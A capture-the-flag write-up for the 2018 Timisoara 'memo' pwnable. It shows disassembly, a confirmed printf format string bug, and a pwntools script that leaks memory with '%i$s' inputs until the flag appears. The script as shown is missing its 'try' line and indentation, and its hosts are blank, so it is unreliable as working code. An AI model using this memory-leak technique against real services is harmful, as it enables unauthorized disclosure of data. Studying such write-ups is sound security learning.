# [Timisoara CTF Quals 2018] memo (Pwnable-70pts)
## Discovery time !
In this task we were given a binary and `host:port` of the server.
when we connect to the server the binary ask us for our name and display three numbers on the screen for one second. For each number, it asks us what number was on the screen. If we have entered the three good numbers, it displays "You have a very good memory `the name you entered`" followed by "Bye!".
$ nc 31339
Your name? > user1
Let's play
What number was on the screen? 42
Good memory!
What number was on the screen? 77
Good memory!
What number was on the screen? 111
Good memory!
You have a very good memory user1
After trying several times we realize that the binary always display the same numbers.
## Reverse time !
Now that we have discovered the binary it's now time to reverse it!
So we have disassembled the binary with radare2 and something quickly attracted our attention:
$ r2 ./memo
[0x00400a00]> pd 200 @main
;-- main:
0x00400b00 55 push rbp
0x00400b01 4889e5 mov rbp, rsp
0x00400dcf 48bf82114000. movabs rdi, str.You_have_a_very_good_memory ; 0x401182 ; "You have a very good memory "
0x00400dd9 b000 mov al, 0
0x00400ddb e840fbffff call sym.imp.printf
0x00400de0 488d7db0 lea rdi, qword [rbp - 0x50]
0x00400de4 89854cffffff mov dword [rbp - 0xb4], eax
0x00400dea b000 mov al, 0
0x00400dec e82ffbffff call sym.imp.printf
0x00400df1 48bf9f114000. movabs rdi, str._nBye_ ; 0x40119f ; "\nBye!"
0x00400dfb 898548ffffff mov dword [rbp - 0xb8], eax
0x00400e01 e8eafaffff call sym.imp.puts
In the above extract we can see that the binary is doing something like this:
printf("You have a very good memory ");
So we can suppose that there is a format string vulnerability here.
We test with a format identifiers in our name to check that:
$ nc 31339
Your name? > %s
Let's play
You have a very good memory (null)
And we see that `%s` is interpreted by printf.
We definitely have a format string vulnerability here !
## Pwn time !
And finally, now that we found a vulnerability let's exploit it !
We found a **format string vulnerability** that means we can read all the program memory and even write in it !
First, we code a little python script to read the memory:
from pwn import *
import sys
i = 0
while True:
i += 1
r = remote('', 31339, level='error')
r.recvuntil("? > ")
r.sendline("%" + str(i) + "$s")
except EOFError, exception:
We run it:
$ python pwner.py
You have a very good memory You have a very good memory n?
You have a very good memory
You have a very good memory H=���s1�H\x83�\xfe�
You have a very good memory 1�I��^H\x89�H���PTI���@
You have a very good memory timctf{t0_4rr1ve_4t_th3_s1mple_is_d1ff1cult}
You have a very good memory (null)
**Et voilà !**